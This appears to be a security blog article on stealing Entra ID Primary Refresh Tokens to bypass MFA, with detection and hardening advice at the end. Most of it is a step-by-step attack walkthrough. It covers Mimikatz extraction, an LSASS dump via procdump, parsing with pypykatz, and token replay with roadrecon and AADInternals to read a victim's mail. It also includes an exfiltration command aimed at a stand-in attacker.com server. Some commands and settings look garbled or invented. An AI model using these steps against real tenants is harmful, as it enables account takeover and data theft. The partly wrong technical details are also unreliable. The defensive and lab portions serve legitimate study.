PRTxtractor Unleashed: How Attackers Bypass MFA by Stealing Entra ID Primary Refresh Tokens + Video

Listen to this Post

Featured Image

Introduction:

Primary Refresh Tokens (PRTs) are the cryptographic keys to the kingdom in modern Entra ID (formerly Azure AD) environments, enabling seamless single sign-on and session persistence. However, when an attacker extracts a PRT from a compromised Windows endpoint, they can forge device identities, bypass Multi-Factor Authentication (MFA) entirely, and access cloud resources as if they were the legitimate user—no password or second factor required. This article dissects the PRT extraction attack chain, provides hands-on steps for red-team simulation, and offers defensive measures to lock down Entra ID token hygiene.

Learning Objectives:

  • Understand the architecture and role of Primary Refresh Tokens in Entra ID authentication.
  • Learn step-by-step extraction of PRTs using tools like Mimikatz and PRTxtractor on Windows and Linux.
  • Implement detection rules, Conditional Access policies, and token protection to mitigate PRT theft.

You Should Know:

  1. What Is a Primary Refresh Token (PRT) and Why Attackers Covet It

A PRT is a JSON Web Token (JWT) issued by Entra ID to a Windows 10/11 or later device that is Hybrid or Azure AD-joined. It acts as the master session key: the device uses the PRT to request access tokens for any application without re‑entering credentials or MFA. Because the PRT is bound to the device’s hardware (via the Trusted Platform Module – TPM), extraction was once difficult, but attackers now bypass TPM protections by abusing the Windows Data Protection API (DPAPI) and retrieving the PRT from LSASS memory or the user’s local state.

Once stolen, an attacker can replay the PRT on their own machine, impersonate the device, and request tokens for Microsoft 365, SharePoint, VPN, or custom apps – completely sidestepping MFA.

2. PRT Extraction on Windows Using Mimikatz (Step‑by‑Step)

This method targets the DPAPI blob containing the PRT, which is stored under the user’s profile. You need local administrator privileges on the compromised Windows host.

Step 1 – Elevate to SYSTEM

Open an elevated Command Prompt or PowerShell, then run Mimikatz:

mimikatz.exe "privilege::debug" "token::elevate" "exit"

Step 2 – Extract the PRT DPAPI Blob

Use the `dpapi::prt` module (available in recent Mimikatz versions):

mimikatz.exe "privilege::debug" "dpapi::prt /user:[email protected] /password:PlaintextPass? /method:logon" "exit"

Alternatively, if you have a hash or a TOTP, adjust accordingly. The output will show a base64‑encoded PRT value.

Step 3 – Convert PRT to a Usable Token
Use the `AADInternals` PowerShell module to transform the extracted blob into a raw PRT JWT:

Install-Module AADInternals -Force
Import-Module AADInternals
$prtBlob = "<base64 from Mimikatz>"
$prtJwt = ConvertTo-AADIntPRT -PRTBlob $prtBlob
$prtJwt | Out-File -FilePath C:\temp\prt.txt

Step 4 – Exfiltrate

Copy the `prt.txt` file to your attacker controller (e.g., via HTTP upload, SMB, or C2 channel).

  1. PRT Extraction Using PRTxtractor – Dedicated Tool Approach

The tool mentioned in the original post, “PRTxtractor,” is a focused utility that automates the extraction and exfiltration of PRTs. While not publicly released, you can replicate its functionality with a Python script that calls Mimikatz in memory and sends the token to a remote listener.

Simulated PRTxtractor Workflow

Assume the tool is deployed as a Windows executable or PowerShell one‑liner:

 Fake PRTxtractor command (conceptual)
PRTxtractor.exe /target:[email protected] /server:https://attacker.com/exfil

Under the hood, it performs:

– `procdump -ma lsass.exe lsass.dmp`
– Extracts PRT from the dump using `pypykatz`
– Base64 encodes and POSTs to attacker server

Linux‑Based Extraction (from a Windows memory dump)

If you obtain an LSASS dump from the target, use `pypykatz` on Kali:

pypykatz lsa minidump lsass.dmp
 Look for "prt" or "PrimaryRefreshToken" entries
 Save the token to a file
echo -n "token_value" > prt.jwt

Then replay it with `roadrecon` (see next section).

  1. Using an Extracted PRT to Bypass MFA on Linux / Windows

Once you have the raw PRT JWT, you can impersonate the device and obtain access tokens for any Entra ID application without ever providing a password or MFA.

On Linux (using roadrecon – an Azure AD reconnaissance tool)

 Install roadrecon
pip3 install roadrecon
 Authenticate using the stolen PRT
roadrecon auth prt --prt-token "$(cat prt.jwt)" --username [email protected]
 Request an access token for Microsoft Graph
roadrecon token get --resource https://graph.microsoft.com
 Use the token with curl
curl -H "Authorization: Bearer <access_token>" https://graph.microsoft.com/v1.0/me

On Windows (using AADInternals)

Import-Module AADInternals
$prt = Get-Content C:\temp\prt.txt
$accessToken = Get-AADIntAccessTokenForPRT -PRTToken $prt -Resource "https://graph.microsoft.com"
Invoke-WebRequest -Uri "https://graph.microsoft.com/v1.0/me/messages" -Headers @{Authorization="Bearer $accessToken"}

Result – The attacker successfully reads the victim’s email, OneDrive files, Teams chats, and more, with MFA completely bypassed.

5. Detection: Logs, Queries, and Anomalies

Defenders must hunt for PRT replay indicators. The most reliable source is Entra ID sign‑in logs.

KQL Query for Microsoft Sentinel / Log Analytics

SigninLogs
| where ResourceIdentity == "Primary Refresh Token"
| where Status.errorCode == 0
| extend DeviceId = tostring(DeviceInfo.deviceId)
| extend IsInteractive = tobool(DeviceInfo.isInteractive)
| where IsInteractive == false // PRT replay is non‑interactive
| summarize Count = count(), FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by UserPrincipalName, DeviceId, IPAddress, UserAgent
| where Count > 2 // Multiple token requests from same device in short time

Sysmon Event ID 10 (ProcessAccess) – Monitor LSASS access by unusual processes (e.g., procdump.exe, mimikatz.exe, python.exe).
Windows Event ID 4624 – Look for logon type 9 (NewCredentials) or type 4 (Batch) from non‑interactive PRT flows.

Network Detection – Outbound connections from workstations to rare IPs over HTTPS (exfiltration) or inbound connections from attacker‑controlled IPs for token replay.

  1. Mitigation and Hardening: Stop PRT Theft Before It Starts

Enable Token Protection (Preview) – Token Protection binds access tokens to the device’s TPM, making replayed tokens invalid. Go to Entra Admin Center > Protection > Authentication Methods > Token Protection.

Disable Legacy Protocol Fallback – PRT extraction often succeeds because DPAPI is weak when TPM is unavailable. Force TPM usage:

 On Windows, ensure TPM is initialized and PCR7 binding is active
Get-Tpm
 Enable "Require TPM for PRT" via Group Policy: Computer Config > Admin Templates > System > Trusted Platform Module Services

Conditional Access Policy – Block token replay by requiring “Compliant device” or “Hybrid joined device” with sign‑in frequency set to “Every time” for sensitive apps. This forces fresh authentication, making stolen PRTs short‑lived.

Restrict LSASS Access – Enable Windows Defender Credential Guard:

 Deploy via Group Policy or PowerShell
$IsEnabled = $true
$CredGuardPath = "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard"
Set-ItemProperty -Path $CredGuardPath -Name "EnableVirtualizationBasedSecurity" -Value 1 -Force
Set-ItemProperty -Path $CredGuardPath -Name "RequirePlatformSecurityFeatures" -Value 1 -Force
Set-ItemProperty -Path $CredGuardPath -Name "LsaCfgFlags" -Value 1 -Force

User Awareness – PRT extraction requires admin rights on the endpoint. Prioritize removing local admin rights and using LAPS (Local Administrator Password Solution).

  1. Red Team Lab Setup: Simulate PRT Extraction End‑to‑End

Build a safe lab to test PRT attacks and defenses.

Components

  • Azure tenant (free trial) with a test user `[email protected]`
    – Windows 10/11 VM joined to Entra ID (Hybrid or Azure AD joined)
  • Attacker Kali Linux VM (or Windows attacker VM with Mimikatz and roadrecon)

Step‑by‑Step Simulation

  1. On the victim Windows VM, log in as `victim` and ensure PRT is issued (check `dsregcmd /status` – look for “AzureAdJoined: YES” and “PrimaryRefreshToken: Present”).
  2. On attacker VM, gain admin access to victim VM (e.g., via RDP or Cobalt Strike beacon).
  3. Run Mimikatz `dpapi::prt` as shown in section 2 to extract the PRT.
  4. On attacker VM, use `roadrecon auth prt` to replay the PRT.
  5. Request a Microsoft Graph access token and list victim’s emails.
  6. Defend by enabling Token Protection – repeat the attack and observe failure (HTTP 401 with “token protection required”).

Cleanup – Delete test tenant after exercise to avoid token reuse.

What Undercode Say:

  • PRT theft turns MFA into a speed bump, not a barrier – Once an endpoint is compromised with admin rights, all cloud resources become accessible regardless of MFA enrollment.
  • Detection is reactive but critical – Organizations must monitor non‑interactive logins and LSASS access patterns; however, proactive token protection is the only true fix.
  • Token Protection is underused – Microsoft’s Token Protection feature (available for Entra ID Premium P2) should be mandatory for any high‑privilege account or sensitive application, yet most enterprises ignore it.

Prediction:

As PRT extraction tools become commoditized (e.g., PRTxtractor), Microsoft and other IdPs will accelerate the adoption of device‑bound tokens with hardware attestation. Within two years, “replay‑proof” PRTs using TPM 2.0 and secure enclaves will become the default, and legacy MFA bypass techniques will fade. Simultaneously, attackers will shift to on‑path token substitution and consent phishing, starting an arms race over continuous access evaluation (CAE) and real‑time risk signals. Organizations that fail to enable Token Protection today will face breach headlines tomorrow.

▶️ Related Video (82% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Elzerpineda Entraid – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky